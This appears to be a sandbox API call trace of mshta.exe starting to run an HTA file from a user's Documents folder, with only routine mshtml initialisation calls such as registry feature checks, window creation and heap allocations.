[0079.872] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.872] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.872] RegCloseKey (hKey=0x0) returned 0x6
[0079.872] RegCloseKey (hKey=0x0) returned 0x6
[0079.872] RegCloseKey (hKey=0x9c) returned 0x0
[0079.872] RegCloseKey (hKey=0x98) returned 0x0
[0079.872] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0079.875] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0xa0) returned 0x0
[0079.875] RegOpenKeyExW (in: hKey=0xa0, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.875] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.876] RegCloseKey (hKey=0x0) returned 0x6
[0079.876] RegCloseKey (hKey=0x0) returned 0x6
[0079.876] RegCloseKey (hKey=0x9c) returned 0x0
[0079.876] RegCloseKey (hKey=0xa0) returned 0x0
[0079.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0xa0) returned 0x0
[0079.876] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.876] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.876] RegOpenKeyExW (in: hKey=0xa0, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.876] RegCloseKey (hKey=0x0) returned 0x6
[0079.876] RegCloseKey (hKey=0x0) returned 0x6
[0079.876] RegCloseKey (hKey=0xa0) returned 0x0
[0079.876] RegCloseKey (hKey=0x9c) returned 0x0
[0079.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0xa0) returned 0x0
[0079.877] RegOpenKeyExW (in: hKey=0xa0, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.877] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.877] RegCloseKey (hKey=0x0) returned 0x6
[0079.877] RegCloseKey (hKey=0x0) returned 0x6
[0079.877] RegCloseKey (hKey=0x9c) returned 0x0
[0079.877] RegCloseKey (hKey=0xa0) returned 0x0
[0079.877] GetSystemMetrics (nIndex=68) returned 4
[0079.877] GetSystemMetrics (nIndex=69) returned 4
[0079.878] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0079.878] GetSystemDefaultLCID () returned 0x409
[0079.879] GetVersionExW (in: lpVersionInformation=0x39f410*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77a0e36c, dwMinorVersion=0x77a0e0d2, dwBuildNumber=0x73daafd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x39f410*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.879] GetUserDefaultUILanguage () returned 0x409
[0079.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x39f360, cchData=16 | out: lpLCData="\x03") returned 16
[0079.880] GetKeyboardLayoutList (in: nBuff=32, lpList=0x39f390 | out: lpList=0x39f390) returned 1
[0079.880] GetSystemMetrics (nIndex=4096) returned 0
[0079.880] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b4 | out: phkResult=0x39f4b4*=0xa0) returned 0x0
[0079.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b8 | out: phkResult=0x39f4b8*=0x9c) returned 0x0
[0079.881] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f474 | out: phkResult=0x39f474*=0x0) returned 0x2
[0079.881] RegOpenKeyExW (in: hKey=0xa0, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f474 | out: phkResult=0x39f474*=0x0) returned 0x2
[0079.881] RegCloseKey (hKey=0x0) returned 0x6
[0079.881] RegCloseKey (hKey=0x0) returned 0x6
[0079.881] RegCloseKey (hKey=0xa0) returned 0x0
[0079.881] RegCloseKey (hKey=0x9c) returned 0x0
[0079.881] GetModuleFileNameW (in: hModule=0x73870000, lpFilename=0x39f31c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e
[0079.881] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x3e) returned 0x123df8
[0079.881] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0079.881] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0079.881] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0079.881] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0079.881] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0079.881] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc132
[0079.882] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc133
[0079.882] GetDC (hWnd=0x0) returned 0xd010b9e
[0079.882] SHCreateShellPalette (hdc=0x0) returned 0xa080bd1
[0079.882] GetPaletteEntries (in: hpal=0xa080bd1, iStart=0x0, cEntries=0x100, pPalEntries=0x73daa494 | out: pPalEntries=0x73daa494) returned 0x100
[0079.882] SHGetInverseCMAP (in: pbMap=0x73da8a7c, cbMap=0x4 | out: pbMap=0x73da8a7c) returned 0x0
[0079.882] GetDeviceCaps (hdc=0xd010b9e, index=38) returned 32409
[0079.882] ReleaseDC (hWnd=0x0, hDC=0xd010b9e) returned 1
[0079.882] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20a) returned 0x12ea60
[0079.883] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x2000) returned 0x12ec78
[0079.883] GetCurrentProcessId () returned 0xe80
[0079.883] _vsnprintf (in: _DstBuf=0x39f860, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x39f528 | out: _DstBuf="#MSHTML#PERF#00000E80") returned 21
[0079.883] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000E80") returned 0x0
[0079.883] GetVersionExW (in: lpVersionInformation=0x39f544*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x12dfe8, dwMinorVersion=0x110000, dwBuildNumber=0x12dfe0, dwPlatformId=0x39f588, szCSDVersion="A") | out: lpVersionInformation=0x39f544*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.884] GetModuleHandleW (lpModuleName="advapi32") returned 0x76c20000
[0079.884] GetProcAddress (hModule=0x76c20000, lpProcName="EventWrite") returned 0x77a40c59
[0079.884] GetProcAddress (hModule=0x76c20000, lpProcName="EventRegister") returned 0x77a1f6ba
[0079.884] GetProcAddress (hModule=0x76c20000, lpProcName="EventUnregister") returned 0x77a39241
[0079.884] EtwEventRegister () returned 0x0
[0079.884] EtwRegisterTraceGuidsW () returned 0x0
[0079.884] EtwRegisterTraceGuidsW () returned 0x0
[0079.884] EtwEventRegister () returned 0x0
[0079.885] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x39f310 | out: lpdwHandle=0x39f310) returned 0x0
[0079.886] GetModuleHandleW (lpModuleName=0x0) returned 0x480000
[0079.886] GetModuleFileNameW (in: hModule=0x480000, lpFilename=0x39f31c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0079.886] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0079.889] GetCurrentProcessId () returned 0xe80
[0079.889] GetCurrentProcessId () returned 0xe80
[0079.901] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xc0
[0079.901] GetLastError () returned 0xb7
[0079.901] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc4
[0079.902] MapViewOfFile (hFileMappingObject=0xc4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x250000
[0079.913] HeapFree (in: hHeap=0x30000, dwFlags=0x0, lpMem=0x31d98 | out: hHeap=0x30000) returned 1
[0079.914] HeapFree (in: hHeap=0x30000, dwFlags=0x0, lpMem=0x31ea8 | out: hHeap=0x30000) returned 1
[0079.914] RegCloseKey (hKey=0x46) returned 0x0
[0079.914] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000
[0079.914] GetProcAddress (hModule=0x769b0000, lpProcName="RegisterApplicationRestart") returned 0x769eb51c
[0079.914] lstrlenA (lpString="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" ") returned 46
[0079.914] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x5e) returned 0x31d98
[0079.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b50, cbMultiByte=-1, lpWideCharStr=0x31d98, cchWideChar=47 | out: lpWideCharStr="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" ") returned 47
[0079.914] RegisterApplicationRestart (pwzCommandline="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" ", dwFlags=0x0) returned 0x0
[0079.915] HeapFree (in: hHeap=0x30000, dwFlags=0x0, lpMem=0x31d98 | out: hHeap=0x30000) returned 1
[0079.915] GetProcAddress (hModule=0x73870000, lpProcName="RunHTMLApplication") returned 0x738ce710
[0079.915] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" "
[0079.915] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x62) returned 0x1353a0
[0079.915] OleInitialize (pvReserved=0x0) returned 0x0
[0080.017] IsWindow (hWnd=0x0) returned 0
[0080.018] RegisterClassW (lpWndClass=0x39fbcc) returned 0xc216
[0080.018] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x480000, lpParam=0x73da9680) returned 0x20312
[0080.018] NtdllDefWindowProc_W () returned 0x0
[0080.018] NtdllDefWindowProc_W () returned 0x1
[0080.020] NtdllDefWindowProc_W () returned 0x0
[0080.027] NtdllDefWindowProc_W () returned 0x0
[0080.027] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x20312, hMenu=0x0, hInstance=0x480000, lpParam=0x73da9680) returned 0x20314
[0080.027] NtdllDefWindowProc_W () returned 0x0
[0080.027] NtdllDefWindowProc_W () returned 0x1
[0080.027] NtdllDefWindowProc_W () returned 0x0
[0080.028] NtdllDefWindowProc_W () returned 0x0
[0080.028] SetWindowLongW (hWnd=0x20314, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0080.028] NtdllDefWindowProc_W () returned 0x0
[0080.029] NtdllDefWindowProc_W () returned 0x0
[0080.029] NtdllDefWindowProc_W () returned 0x0
[0080.029] NtdllDefWindowProc_W () returned 0x0
[0080.029] NtdllDefWindowProc_W () returned 0x0
[0080.029] NtdllDefWindowProc_W () returned 0x0
[0080.029] SetWindowPos (hWnd=0x20314, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0080.030] NtdllDefWindowProc_W () returned 0x0
[0080.030] NtdllDefWindowProc_W () returned 0x0
[0080.035] NtdllDefWindowProc_W () returned 0x0
[0080.036] NtdllDefWindowProc_W () returned 0x0
[0080.037] NtdllDefWindowProc_W () returned 0x0
[0080.043] SendMessageW (hWnd=0x20314, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0080.043] NtdllDefWindowProc_W () returned 0x0
[0080.043] NtdllDefWindowProc_W () returned 0x0
[0080.043] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x62) returned 0x13b350
[0080.043] PathRemoveArgsW (in: pszPath="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" " | out: pszPath="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\"")
[0080.044] PathRemoveBlanksW (in: pszPath="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\"" | out: pszPath="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\"")
[0080.044] PathUnquoteSpacesW (in: lpsz="\"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\"" | out: lpsz="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 1
[0080.044] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", ppmk=0x39fc2c*=0x0, dwFlags=0x1 | out: ppmk=0x39fc2c*=0x13a4d0) returned 0x0
[0080.058] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13b350 | out: hHeap=0x110000) returned 1
[0080.059] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13dec0
[0080.059] CoCreateInstance (in: rclsid=0x739a9770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73a2b75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x73da96d4 | out: ppv=0x73da96d4*=0x141a90) returned 0x0
[0080.069] DllGetClassObject (in: rclsid=0x13f95c*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76ecee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39eee4 | out: ppv=0x39eee4*=0x73da8cb0) returned 0x0
[0080.070] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x2a8) returned 0x140758
[0080.070] GetCurrentThreadId () returned 0xe84
[0080.070] RegisterClassExW (param_1=0x39ed7c) returned 0xc171
[0080.071] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc171, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x73870000, lpParam=0x0) returned 0x20320
[0080.071] GetWindowLongW (hWnd=0x20320, nIndex=-20) returned 0
[0080.071] NtdllDefWindowProc_W () returned 0x1
[0080.071] NtdllDefWindowProc_W () returned 0x0
[0080.071] NtdllDefWindowProc_W () returned 0x0
[0080.072] NtdllDefWindowProc_W () returned 0x0
[0080.072] NtdllDefWindowProc_W () returned 0x0
[0080.072] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13df98
[0080.072] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13dfb0
[0080.072] CreateCompatibleDC (hdc=0x0) returned 0x5b0108ae
[0080.072] GetDeviceCaps (hdc=0x5b0108ae, index=90) returned 96
[0080.072] GetDeviceCaps (hdc=0x5b0108ae, index=88) returned 96
[0080.072] GetSystemMetrics (nIndex=68) returned 4
[0080.072] GetSystemMetrics (nIndex=69) returned 4
[0080.072] GetSystemMetrics (nIndex=2) returned 17
[0080.072] GetSystemMetrics (nIndex=3) returned 17
[0080.072] GetStockObject (i=13) returned 0x18a002e
[0080.072] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0x18a002e
[0080.072] GetTextMetricsW (in: hdc=0x5b0108ae, lptm=0x39ee14 | out: lptm=0x39ee14) returned 1
[0080.073] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0x18a002e
[0080.073] DeleteObject (ho=0x18a002e) returned 1
[0080.073] GetSystemDefaultLCID () returned 0x409
[0080.073] GetUserDefaultLCID () returned 0x409
[0080.073] GetACP () returned 0x4e4
[0080.073] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x39ed88, cchData=41 | out: lpLCData="1") returned 2
[0080.073] _wtoi (_String="1") returned 1
[0080.073] RegCloseKey (hKey=0x0) returned 0x6
[0080.073] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x39eddc, cchData=16 | out: lpLCData="0123456789") returned 11
[0080.073] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x73dab038, fWinIni=0x0 | out: pvParam=0x73dab038) returned 1
[0080.073] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x39ee50, fWinIni=0x0 | out: pvParam=0x39ee50) returned 1
[0080.073] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc0) returned 0x140b10
[0080.073] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13dfc8
[0080.073] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa4) returned 0x140bd8
[0080.074] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x133778
[0080.074] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1c) returned 0x13ab48
[0080.074] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x129158
[0080.074] GetSystemWindowsDirectoryW (in: lpBuffer=0x39ec5c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0080.074] lstrlenW (lpString="C:\\Windows") returned 10
[0080.074] lstrlenW (lpString="\\WindowsShell.manifest") returned 22
[0080.074] CreateActCtxW (pActCtx=0x39ec38) returned 0x140c8c
[0080.077] ActivateActCtx (in: hActCtx=0x140c8c, lpCookie=0x39ec08 | out: hActCtx=0x140c8c, lpCookie=0x39ec08) returned 1
[0080.077] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x745f0000
[0080.084] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c8d0001) returned 1
[0080.084] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0080.084] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0080.085] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0080.085] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0080.085] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x39e868, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0080.085] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39ea70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0080.085] GetCurrentProcess () returned 0xffffffff
[0080.085] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x39ec78, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9
[0080.086] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0080.086] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x133798
[0080.086] FindAtomW (lpString="TridentEnableHiRes") returned 0x0
[0080.086] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x39e854, pvData=0x39e860, pcbData=0x39e85c*=0x4 | out: pdwType=0x39e854*=0x0, pvData=0x39e860, pcbData=0x39e85c*=0x4) returned 0x2
[0080.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39e7cc | out: phkResult=0x39e7cc*=0x15c) returned 0x0
[0080.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39e7d0 | out: phkResult=0x39e7d0*=0x158) returned 0x0
[0080.087] RegOpenKeyExW (in: hKey=0x158, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x39e78c | out: phkResult=0x39e78c*=0x0) returned 0x2
[0080.087] RegOpenKeyExW (in: hKey=0x15c, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x39e78c | out: phkResult=0x39e78c*=0x0) returned 0x2
[0080.087] RegCloseKey (hKey=0x0) returned 0x6
[0080.087] RegCloseKey (hKey=0x0) returned 0x6
[0080.087] RegCloseKey (hKey=0x15c) returned 0x0
[0080.087] RegCloseKey (hKey=0x158) returned 0x0
[0080.087] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x97c) returned 0x141a90
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x480) returned 0x142418
[0080.088] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0080.088] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0080.088] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0080.088] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x141670
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x1428a0
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x1428f8
[0080.088] GetCurrentThreadId () returned 0xe84
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e088
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x2c) returned 0x12d780
[0080.088] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x80) returned 0x142950
[0080.089] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc172
[0080.089] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x1337b8
[0080.089] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1
[0080.090] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x73da8cd4, dwReserved=0x0 | out: ppSM=0x73da8cd4*=0x1429d8) returned 0x0
[0080.096] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x64) returned 0x142fa8
[0080.097] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x143018
[0080.097] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x12d078
[0080.098] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x1337d8
[0080.098] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x1291a8
[0080.098] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x1291f8
[0080.098] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x143070
[0080.098] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x64) returned 0x1430d8
[0080.098] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x129248
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x143148
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xec) returned 0x1433b0
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x129298
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x1292e8
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x129338
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x1434a8
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x143510
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x129388
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x1293d8
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x90) returned 0x143578
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x140) returned 0x143610
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8) returned 0x13b868
[0080.099] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x12d0a8
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x1337f8
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xd0) returned 0x13c0a0
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x38) returned 0x134138
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x128) returned 0x143758
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x148) returned 0x143888
[0080.100] GetCurrentThreadId () returned 0xe84
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x5c) returned 0x1439d8
[0080.100] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x133818
[0080.100] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x39eb7c | out: ppURI=0x39eb7c*=0x13baac) returned 0x0
